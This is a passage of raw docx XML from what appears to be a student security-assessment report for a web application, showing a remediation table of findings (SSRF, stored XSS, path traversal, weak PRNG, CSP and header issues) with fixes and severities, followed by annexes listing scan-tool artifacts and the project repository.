            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CA8D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0BC31D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-002</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74D77A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF via EPUB proxy</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657504">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Implement URL allowlist; reject private IP ranges and non-HTTPS URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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tcPr>
          <w:p w14:paraId="6C0E9EBA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5BAE8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F551F6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-003</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56FBC7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored XSS via EPUB</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23485F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Set allowScriptedContent: false; add server-side HTML sanitization on EPUB upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DCF011A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0EA36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6438AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-004</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068E96">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>axios vulnerabilities</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A35E4E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm audit fix to upgrade axios to &gt;=1.15.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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3047E605">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65F5E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E5792F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-005</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18A2AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xmldom vulnerabilities</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EA1E4E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm audit fix --force to upgrade epubjs to 0.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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4849E4F7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="40230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B70101">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-006</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5E8E68">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>react-router vulnerabilities</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9102DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm audit fix to upgrade react-router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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13DA1A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A93E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C606DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-007</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192DA4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal</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53F62A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace path.join with path.resolve; validate resolved path starts with target dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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486EABFD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="719D2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69522D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-008</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3A2FDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak PRNG</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C6E66A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace Math.random() with crypto.randomBytes(32); hash tokens before storing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEBD0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FF4F644">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27027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FE6EBB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-009</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20CC5C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broken CSP</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8BAB2C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tighten CSP: script-src 'self' with nonces; remove wildcards and unsafe-eval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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71FBDBEF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1BD29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5AD50C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-010</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B6963A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No clickjacking protection</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9139B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Add helmet middleware or X-Frame-Options: DENY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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4C71486C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BA17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CAF30E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-011</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EC0655">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate dep vulns</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145412">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm audit fix for follow-redirects, ip-address, postcss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9E7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D380066">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38C77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5B0504">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-012</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EBAF97">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing headers</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3EFE60">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Install helmet: npm i helmet; app.use(helmet())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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tcPr>
          <w:p w14:paraId="6888DC96">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BE3A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6510AD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-013</w:t>
            </w:r>
          </w:p>
        </w:tc>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3CCC0E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-Powered-By leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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6373E9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>app.disable('x-powered-by') or use helmet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5F5E3"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16198541">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A040A9C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="776209CB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7. Annexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B35BA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7.1 Raw Tool Output References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078029E2">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following raw tool outputs are stored as GitHub Actions pipeline artifacts and can be downloaded from the Actions tab of the repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76760580">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sca-report: sca-npm-audit.json + sca-npm-audit-readable.txt (npm audit output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B03C7">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sast-report: sast-semgrep-report.json + sast-semgrep-readable.txt (Semgrep findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE663CD">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dast-report: report_html.html + report_json.json + report_md.md (OWASP ZAP scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6C2A1">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zap_scan: ZAP baseline scan archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E488A7E">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC5B821">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7.2 GitHub Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B96531">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repository: https://github.com/QasimShakir/CyberSecurity_Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FDA8B6">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All commits follow the issue-association format required by the course: git commit -m "type: description. Fixes #N"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693295D1">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DD6126">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7.3 Pipeline Runs</w:t>
      </w:r>
